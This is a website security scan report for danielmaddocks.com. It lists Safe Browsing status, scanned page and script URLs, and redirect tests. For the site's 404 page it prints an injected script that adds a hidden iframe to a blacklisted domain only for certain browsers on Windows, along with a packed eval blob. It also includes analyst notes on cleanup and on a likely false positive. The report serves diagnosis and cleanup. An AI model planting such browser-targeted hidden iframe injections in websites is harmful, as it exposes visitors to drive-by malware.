Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danielmaddocks.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.danielmaddocks.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 11 Oct 2014 23:27:50 GMT Location: http://www.linkedin.com/in/danielmaddocks Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.linkedin.com/in/danielmaddocks | 200 OK Content-Length: 69166 Content-Type: text/html | malicious |
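Malicious code - confirmed by antivirus engines (see below): YEvent.on(window,'load',function(){(function(){var protocol='http:';var d=new Image(1,1);d.onerror=d.onload=function(){d.onerror=d.onload=null;};d.src=[protocol,"//secure-us.imrworldwide.com/cgi-bin/m?ci=us-603751h&cg=0&cc=1&si=",escape(window.location.href),"&ts=compact&rnd=",(new Date()).getTime()].join('');})();}); Note: the quoted snippet only requests a 1x1 image from secure-us.imrworldwide.com, passing the escaped page URL and a timestamp. Nothing in it loads script or modifies the page, which is the shape of a third-party measurement beacon rather than an injection. The antivirus reports referred to are missing from this copy of the page, so treat this verdict as unconfirmed and a possible false positive until it is checked against them. Antivirus reports: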
| ||
http://static.licdn.com:80/scds/common/u/lib/fizzy/fz-1.3.6-min.js | 200 OK Content-Length: 27495 Content-Type: text/javascript | clean |
http://s.c.lnkd.licdn.com/scds/concat/common/js?h=3nuvxgwg15rbghxm1gpzfbya2-35e6ug1j754avohmn1bzmucat-mv3v66b8q0h1hvgvd3yfjv5f-14k913qahq3mh0ac0lh0twk9v-dfoaudjrk6rbf82f45bz5crwi-62og8s54488owngg0s7escdit-c8ha6zrgpgcni7poa5ctye7il-djim7uyllidc9gta745y2wo5m-51dv6schthjydhvcv6rxvospp-d7z5zqt26qe7ht91f8494hqx5-e9rsfv7b5gx0bk0tln31dx3sq-2r5gveucqe4lsolc3n0oljsn1-8v2hz0euzy8m1tk5d6tfrn6j-b88qxy99s08xoe ...[328 symbols skipped]... | 200 OK Content-Length: 277120 Content-Type: text/javascript | clean |
http://s.c.lnkd.licdn.com/scds/concat/common/js?h=4zslye83akez5s4mf91hrq425-95d8d303rtd0n9wj4dcjbnh2c&fc=2 | 200 OK Content-Length: 2254 Content-Type: text/javascript | clean |
http://s.c.lnkd.licdn.com/scds/concat/common/js?h=d43qahhuvg0j5mlh4c2m9sipk-ew7wxbzv14lsc4vzkh2xrbzqn-dp1os5pzpoyifn8ljtjpfxrz-e17zy6z51dugr6fy4su92o7de-eq875keqggun9hoxzfhbanjes&fc=2 | 200 OK Content-Length: 17345 Content-Type: text/javascript | clean |
http://www.danielmaddocks.com/home?trk=hb_logo | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 11 Oct 2014 23:28:08 GMT Pragma: no-cache Location: http://danielmaddocks.com/home?trk=hb_logo Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://danielmaddocks.com/xmlrpc.php | clean |
http://danielmaddocks.com/home?trk=hb_logo | 404 Not Found Content-Length: 21706 Content-Type: text/html | malicious |
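Malicious code found. Script contains blacklisted domain: www.shop-corp24.com ...[3405 bytes skipped]... >{ var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://www.shop-corp24.com'; js_kod2.width = '320px'; js_kod2.height = '250px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\ ...[16235 bytes skipped]... Note: the readable fragment appends a hidden (visibility:hidden) 320x250 iframe pointing at the blacklisted domain, and only when the detected browser is Opera, MSIE or Firefox on Windows, so a manual check from any other browser or OS will not show it. The text printed after "Decoded script:" is still wrapped in an eval(function(p,a,c,k,e,d)...) packer, so the readable fragment is presumably the scanner's unpacked output and the packed text is what the page actually serves. Because this came back with the site's 404 response, the injection likely sits in a template or include shared across the WordPress theme rather than in a single post; compare the theme and core files against known-good copies. | ||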
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/jquery-1.3.2.min.js | 200 OK Content-Length: 124997 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/jquery.form.js | 200 OK Content-Length: 32580 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10221 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/superfish.js | 200 OK Content-Length: 3848 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/custom.js | 200 OK Content-Length: 2776 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/cufon-yui.js | 200 OK Content-Length: 33753 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/Century_Gothic_400-Century_Gothic_700.font.js | 200 OK Content-Length: 237296 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danielmaddocks.com
Result:
GET / HTTP/1.1
Host: danielmaddocks.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: danielmaddocks.com
Referer: http://www.google.com/search?q=danielmaddocks.com
Result:
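The result is similar to the first query. No suspicious redirects were found. Note that these two requests test only for server-side redirects, with and without a search-engine referer. The iframe injection reported under "Scanned pages/files" runs client-side and only for specific browser/OS combinations, so this result does not by itself clear the site.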
GET / HTTP/1.1
Host: danielmaddocks.com
Referer: http://www.google.com/search?q=danielmaddocks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.